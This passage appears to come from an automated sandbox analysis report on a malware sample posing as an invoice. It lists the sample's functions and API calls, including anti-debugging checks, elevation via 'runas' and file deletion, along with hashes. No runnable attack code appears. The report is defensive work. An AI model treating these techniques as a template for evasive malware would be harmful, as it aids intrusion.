888 21b314-21b31b 886->888 888->882 890 21b321-21b34c WriteFile 888->890 889->882 890->785 891 21b352-21b359 890->891 891->871 892 21b35f-21b366 891->892 892->882
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7b19b26dd6a8dc68c996d86a51cd90870e9790e567cf1c973f98aaf5819e8963
                                                              • Instruction ID: 844aef5381ef0b5ea3cc0fe6b6cc97c781a058005fb79ac662a8c1d52cb60310
                                                              • Opcode Fuzzy Hash: 7b19b26dd6a8dc68c996d86a51cd90870e9790e567cf1c973f98aaf5819e8963
                                                              • Instruction Fuzzy Hash: B2328A75A222298BDB268F14DC846E9B7F5FF5A310F1841D9E40AE7A81D7309ED0CF52
                                                              Function 001F3D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,001F3AA3,?), ref: 001F3D45
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,001F3AA3,?), ref: 001F3D57
                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,002B1148,002B1130,?,?,?,?,001F3AA3,?), ref: 001F3DC8
                                                                • Part of subcall function 001F6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,001F3DEE,002B1148,?,?,?,?,?,001F3AA3,?), ref: 001F6471
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,001F3AA3,?), ref: 001F3E48
                                                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,002A28F4,00000010), ref: 00261CCE
                                                              • SetCurrentDirectoryW.KERNEL32(?,002B1148,?,?,?,?,?,001F3AA3,?), ref: 00261D06
                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0028DAB4,002B1148,?,?,?,?,?,001F3AA3,?), ref: 00261D89
                                                              • ShellExecuteW.SHELL32(00000000,?,?,?,?,001F3AA3), ref: 00261D90
                                                                • Part of subcall function 001F3E6E: GetSysColorBrush.USER32(0000000F), ref: 001F3E79
                                                                • Part of subcall function 001F3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 001F3E88
                                                                • Part of subcall function 001F3E6E: LoadIconW.USER32(00000063), ref: 001F3E9E
                                                                • Part of subcall function 001F3E6E: LoadIconW.USER32(000000A4), ref: 001F3EB0
                                                                • Part of subcall function 001F3E6E: LoadIconW.USER32(000000A2), ref: 001F3EC2
                                                                • Part of subcall function 001F3E6E: RegisterClassExW.USER32(?), ref: 001F3F30
                                                                • Part of subcall function 001F36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001F36E6
                                                                • Part of subcall function 001F36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 001F3707
                                                                • Part of subcall function 001F36B8: ShowWindow.USER32(00000000,?,?,?,?,001F3AA3,?), ref: 001F371B
                                                                • Part of subcall function 001F36B8: ShowWindow.USER32(00000000,?,?,?,?,001F3AA3,?), ref: 001F3724
                                                                • Part of subcall function 001F4FFC: _memset.LIBCMT ref: 001F5022
                                                                • Part of subcall function 001F4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 001F50CB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                              • String ID: ()*$This is a third-party compiled AutoIt script.$runas
                                                              • API String ID: 438480954-3691733941
                                                              • Opcode ID: ce06e2a37d54ea3c59ea69e103e51523f775ff68174d5dc03fb1291fa5220e85
                                                              • Instruction ID: 6c32dd16a84ad46b855a23c8973e71d8f44af45e1fb6311db6fd3232cfa14f37
                                                              • Opcode Fuzzy Hash: ce06e2a37d54ea3c59ea69e103e51523f775ff68174d5dc03fb1291fa5220e85
                                                              • Instruction Fuzzy Hash: C7514530A2424CBACF11ABB8EC2AEFE7B799F25740F004264F71562193DB305669CB21
                                                              Function 0020DDC0 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1079 20ddc0-20de4f call 1fd7f7 GetVersionExW call 1f6a63 call 20dfb4 call 1f6571 1088 20de55-20de56 1079->1088 1089 2624c8-2624cb 1079->1089 1090 20de92-20dea2 call 20df77 1088->1090 1091 20de58-20de63 1088->1091 1092 2624e4-2624e8 1089->1092 1093 2624cd 1089->1093 1110 20dea4-20dec1 GetCurrentProcess call 20df5f 1090->1110 1111 20dec7-20dee1 1090->1111 1096 26244e-262454 1091->1096 1097 20de69-20de6b 1091->1097 1094 2624d3-2624dc 1092->1094 1095 2624ea-2624f3 1092->1095 1099 2624d0 1093->1099 1094->1092 1095->1099 1102 2624f5-2624f8 1095->1102 1100 262456-262459 1096->1100 1101 26245e-262464 1096->1101 1103 20de71-20de74 1097->1103 1104 262469-262475 1097->1104 1099->1094 1100->1090 1101->1090 1102->1094 1108 262495-262498 1103->1108 1109 20de7a-20de89 1103->1109 1106 262477-26247a 1104->1106 1107 26247f-262485 1104->1107 1106->1090 1107->1090 1108->1090 1114 26249e-2624b3 1108->1114 1115 26248a-262490 1109->1115 1116 20de8f 1109->1116 1110->1111 1130 20dec3 1110->1130 1112 20df31-20df3b GetSystemInfo 1111->1112 1113 20dee3-20def7 call 20e00c 1111->1113 1118 20df0e-20df1a 1112->1118 1127 20df29-20df2f GetSystemInfo 1113->1127 1128 20def9-20df01 call 20dff4 GetNativeSystemInfo 1113->1128 1120 2624b5-2624b8 1114->1120 1121 2624bd-2624c3 1114->1121 1115->1090 1116->1090 1124 20df21-20df26 1118->1124 1125 20df1c-20df1f FreeLibrary 1118->1125 1120->1090 1121->1090 1125->1124 1129 20df03-20df07 1127->1129 1128->1129 1129->1118 1133 20df09-20df0c FreeLibrary 1129->1133 1130->1111 1133->1118
                                                              APIs
                                                              • GetVersionExW.KERNEL32(?), ref: 0020DDEC
                                                              • GetCurrentProcess.KERNEL32(00000000,0028DC38,?,?), ref: 0020DEAC
                                                              • GetNativeSystemInfo.KERNELBASE(?,0028DC38,?,?), ref: 0020DF01
                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 0020DF0C
                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 0020DF1F
                                                              • GetSystemInfo.KERNEL32(?,0028DC38,?,?), ref: 0020DF29
                                                              • GetSystemInfo.KERNEL32(?,0028DC38,?,?), ref: 0020DF35
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                              • String ID:
                                                              • API String ID: 3851250370-0
                                                              • Opcode ID: a0a7fac470a07c6544c97ba65b9f1fb29085e31d13a267b41b825d5c5aa1963f
                                                              • Instruction ID: 1f7b2a4646ec2ce7c31173f12f7e8053d30edbf381734ff67bb80a3a8ab92c84
                                                              • Opcode Fuzzy Hash: a0a7fac470a07c6544c97ba65b9f1fb29085e31d13a267b41b825d5c5aa1963f
                                                              • Instruction Fuzzy Hash: 6B61F67182A385DFCF15CFA894C51E9BFB4AF29300B1989D8D8489F287C624C959CB65
                                                              Function 001F406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1151 1f406b-1f4083 CreateStreamOnHGlobal 1152 1f4085-1f409c FindResourceExW 1151->1152 1153 1f40a3-1f40a6 1151->1153 1154 264f16-264f25 LoadResource 1152->1154 1155 1f40a2 1152->1155 1154->1155 1156 264f2b-264f39 SizeofResource 1154->1156 1155->1153 1156->1155 1157 264f3f-264f4a LockResource 1156->1157 1157->1155 1158 264f50-264f6e 1157->1158 1158->1155
                                                              APIs
                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,001F449E,?,?,00000000,00000001), ref: 001F407B
                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,001F449E,?,?,00000000,00000001), ref: 001F4092
                                                              • LoadResource.KERNEL32(?,00000000,?,?,001F449E,?,?,00000000,00000001,?,?,?,?,?,?,001F41FB), ref: 00264F1A
                                                              • SizeofResource.KERNEL32(?,00000000,?,?,001F449E,?,?,00000000,00000001,?,?,?,?,?,?,001F41FB), ref: 00264F2F
                                                              • LockResource.KERNEL32(001F449E,?,?,001F449E,?,?,00000000,00000001,?,?,?,?,?,?,001F41FB,00000000), ref: 00264F42
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                              • String ID: SCRIPT
                                                              • API String ID: 3051347437-3967369404
                                                              • Opcode ID: 8be64e551f24bf07ccae1a52dc8b59020e860209a851f32bc21f184bd655e28f
                                                              • Instruction ID: 3e58fe607a861ec36203d6ef0456a42afd983494175ed7bc2aeee18588f870cb
                                                              • Opcode Fuzzy Hash: 8be64e551f24bf07ccae1a52dc8b59020e860209a851f32bc21f184bd655e28f
                                                              • Instruction Fuzzy Hash: FB117C70200705BFEB218B25EC48F677BB9EFC5B51F10422CF606962A1DF71EC419A20
                                                              Function 00203B70 Relevance: 5.9, Strings: 4, Instructions: 903COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throwstd::exception::exception
                                                              • String ID: @$ +$ +$ +
                                                              • API String ID: 3728558374-3489739628
                                                              • Opcode ID: 896964147efa02030fcd5b8718f4e4805f60c82106ee597d694d92477ed42d9c
                                                              • Instruction ID: f7d060d922e51dde6396d01405ddfff143f12c95c33cd008df4180eff56069a6
                                                              • Opcode Fuzzy Hash: 896964147efa02030fcd5b8718f4e4805f60c82106ee597d694d92477ed42d9c
                                                              • Instruction Fuzzy Hash: 3B72B170E2420ADFCF14EF94C485ABEB7B9EF44304F14805AED05AB292D771AE65CB91
                                                              Function 00236CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00262F49), ref: 00236CB9
                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00236CCA
                                                              • FindClose.KERNEL32(00000000), ref: 00236CDA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: FileFind$AttributesCloseFirst
                                                              • String ID:
                                                              • API String ID: 48322524-0
                                                              • Opcode ID: 56a43469e6ede339ace81de8af1a66f6a89c6bfdeb8e5113a6656e615006cf90
                                                              • Instruction ID: c55b775afb082e8ab452aa3517134357919ed2a48e797102cc093cce2ea1577c
                                                              • Opcode Fuzzy Hash: 56a43469e6ede339ace81de8af1a66f6a89c6bfdeb8e5113a6656e615006cf90
                                                              • Instruction Fuzzy Hash: 95E048718255156783106778FC0D8E9777CDE0633AF504B17F579C11D0E7B0D95485E5
                                                              Function 00203200 Relevance: 2.2, Strings: 1, Instructions: 986COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: +
                                                              • API String ID: 3964851224-3708373374
                                                              • Opcode ID: 11c2dffca05b3c3adb4111076df2133eb3deea4569efdaaf1317bf3d6aa81327
                                                              • Instruction ID: b28a5681f9476bf015dd8885778186b8f30a6c9974b87971fd8b922244a951d2
                                                              • Opcode Fuzzy Hash: 11c2dffca05b3c3adb4111076df2133eb3deea4569efdaaf1317bf3d6aa81327
                                                              • Instruction Fuzzy Hash: CD928F70618341CFD724DF18C494B6AB7E9BF84308F14885DE98A8B3A2DB71ED95CB52
                                                              Function 001FE8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001FE959
                                                              • timeGetTime.WINMM ref: 001FEBFA
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001FED2E
                                                              • TranslateMessage.USER32(?), ref: 001FED3F
                                                              • DispatchMessageW.USER32(?), ref: 001FED4A
                                                              • LockWindowUpdate.USER32(00000000), ref: 001FED79
                                                              • DestroyWindow.USER32 ref: 001FED85
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001FED9F
                                                              • Sleep.KERNEL32(0000000A), ref: 00265270
                                                              • TranslateMessage.USER32(?), ref: 002659F7
                                                              • DispatchMessageW.USER32(?), ref: 00265A05
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00265A19
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                              • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                              • API String ID: 2641332412-570651680
                                                              • Opcode ID: 95e9ef8691173ebb9be18e78cd420f64627f429aefeff0e2261656973605d828
                                                              • Instruction ID: e451b90d9de14af4e24bc3b31d99d7e6ece9ef3c49e6a29fe13f89e9b4552a73
                                                              • Opcode Fuzzy Hash: 95e9ef8691173ebb9be18e78cd420f64627f429aefeff0e2261656973605d828
                                                              • Instruction Fuzzy Hash: 91620770114345DFDB24DF24D899BBA77E4BF44304F18496DFA8A8B2A2DB70D898CB52
                                                              Function 00225C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • ___createFile.LIBCMT ref: 00225EC3
                                                              • ___createFile.LIBCMT ref: 00225F04
                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00225F2D
                                                              • __dosmaperr.LIBCMT ref: 00225F34
                                                              • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00225F47
                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00225F6A
                                                              • __dosmaperr.LIBCMT ref: 00225F73
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00225F7C
                                                              • __set_osfhnd.LIBCMT ref: 00225FAC
                                                              • __lseeki64_nolock.LIBCMT ref: 00226016
                                                              • __close_nolock.LIBCMT ref: 0022603C
                                                              • __chsize_nolock.LIBCMT ref: 0022606C
                                                              • __lseeki64_nolock.LIBCMT ref: 0022607E
                                                              • __lseeki64_nolock.LIBCMT ref: 00226176
                                                              • __lseeki64_nolock.LIBCMT ref: 0022618B
                                                              • __close_nolock.LIBCMT ref: 002261EB
                                                                • Part of subcall function 0021EA9C: CloseHandle.KERNELBASE(00000000,0029EEF4,00000000,?,00226041,0029EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0021EAEC
                                                                • Part of subcall function 0021EA9C: GetLastError.KERNEL32(?,00226041,0029EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0021EAF6
                                                                • Part of subcall function 0021EA9C: __free_osfhnd.LIBCMT ref: 0021EB03
                                                                • Part of subcall function 0021EA9C: __dosmaperr.LIBCMT ref: 0021EB25
                                                                • Part of subcall function 00217C0E: __getptd_noexit.LIBCMT ref: 00217C0E
                                                              • __lseeki64_nolock.LIBCMT ref: 0022620D
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00226342
                                                              • ___createFile.LIBCMT ref: 00226361
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0022636E
                                                              • __dosmaperr.LIBCMT ref: 00226375
                                                              • __free_osfhnd.LIBCMT ref: 00226395
                                                              • __invoke_watson.LIBCMT ref: 002263C3
                                                              • __wsopen_helper.LIBCMT ref: 002263DD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                              • String ID: @
                                                              • API String ID: 3896587723-2766056989
                                                              • Opcode ID: 190421224dab8220db7cf3df2da40506a579db094b75f3671bf2eb24bc55ae0b
                                                              • Instruction ID: 7438384509d9accc7b85963b58fb53a25cb1b68ee924b8d5426d060cb9ab4891
                                                              • Opcode Fuzzy Hash: 190421224dab8220db7cf3df2da40506a579db094b75f3671bf2eb24bc55ae0b
                                                              • Instruction Fuzzy Hash: BB224872920527BBEB259FA8EC497FD7B71EB10314F248229E8119B2D1C7758DB0CB51
                                                              Function 0023FA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • _wcscpy.LIBCMT ref: 0023FA96
                                                              • _wcschr.LIBCMT ref: 0023FAA4
                                                              • _wcscpy.LIBCMT ref: 0023FABB
                                                              • _wcscat.LIBCMT ref: 0023FACA
                                                              • _wcscat.LIBCMT ref: 0023FAE8
                                                              • _wcscpy.LIBCMT ref: 0023FB09
                                                              • __wsplitpath.LIBCMT ref: 0023FBE6
                                                              • _wcscpy.LIBCMT ref: 0023FC0B
                                                              • _wcscpy.LIBCMT ref: 0023FC1D
                                                              • _wcscpy.LIBCMT ref: 0023FC32
                                                              • _wcscat.LIBCMT ref: 0023FC47
                                                              • _wcscat.LIBCMT ref: 0023FC59
                                                              • _wcscat.LIBCMT ref: 0023FC6E
                                                                • Part of subcall function 0023BFA4: _wcscmp.LIBCMT ref: 0023C03E
                                                                • Part of subcall function 0023BFA4: __wsplitpath.LIBCMT ref: 0023C083
                                                                • Part of subcall function 0023BFA4: _wcscpy.LIBCMT ref: 0023C096
                                                                • Part of subcall function 0023BFA4: _wcscat.LIBCMT ref: 0023C0A9
                                                                • Part of subcall function 0023BFA4: __wsplitpath.LIBCMT ref: 0023C0CE
                                                                • Part of subcall function 0023BFA4: _wcscat.LIBCMT ref: 0023C0E4
                                                                • Part of subcall function 0023BFA4: _wcscat.LIBCMT ref: 0023C0F7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                              • String ID: >>>AUTOIT SCRIPT<<<$t2*
                                                              • API String ID: 2955681530-1473486655
                                                              • Opcode ID: eab3368aa20394b6ee9fa40dc6853329cd4732f03bb71d7805258f076b7e1e4c
                                                              • Instruction ID: 287ff43d8d1f564108b3cea2385299f41f2886726de21cc593a9b7a7b386fab0
                                                              • Opcode Fuzzy Hash: eab3368aa20394b6ee9fa40dc6853329cd4732f03bb71d7805258f076b7e1e4c
                                                              • Instruction Fuzzy Hash: 0391C4B1514305AFCB10EF50D981F9BB3E8BF98300F004829F95997292DB30EAA4CF91
                                                              Function 0023BFA4 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 316fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0023BDB4: __time64.LIBCMT ref: 0023BDBE
                                                                • Part of subcall function 001F4517: _fseek.LIBCMT ref: 001F452F
                                                              • __wsplitpath.LIBCMT ref: 0023C083
                                                                • Part of subcall function 00211DFC: __wsplitpath_helper.LIBCMT ref: 00211E3C
                                                              • _wcscpy.LIBCMT ref: 0023C096
                                                              • _wcscat.LIBCMT ref: 0023C0A9
                                                              • __wsplitpath.LIBCMT ref: 0023C0CE
                                                              • _wcscat.LIBCMT ref: 0023C0E4
                                                              • _wcscat.LIBCMT ref: 0023C0F7
                                                              • _wcscmp.LIBCMT ref: 0023C03E
                                                                • Part of subcall function 0023C56D: _wcscmp.LIBCMT ref: 0023C65D
                                                                • Part of subcall function 0023C56D: _wcscmp.LIBCMT ref: 0023C670
                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0023C2A1
                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0023C338
                                                              • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0023C34E
                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0023C35F
                                                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0023C371
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
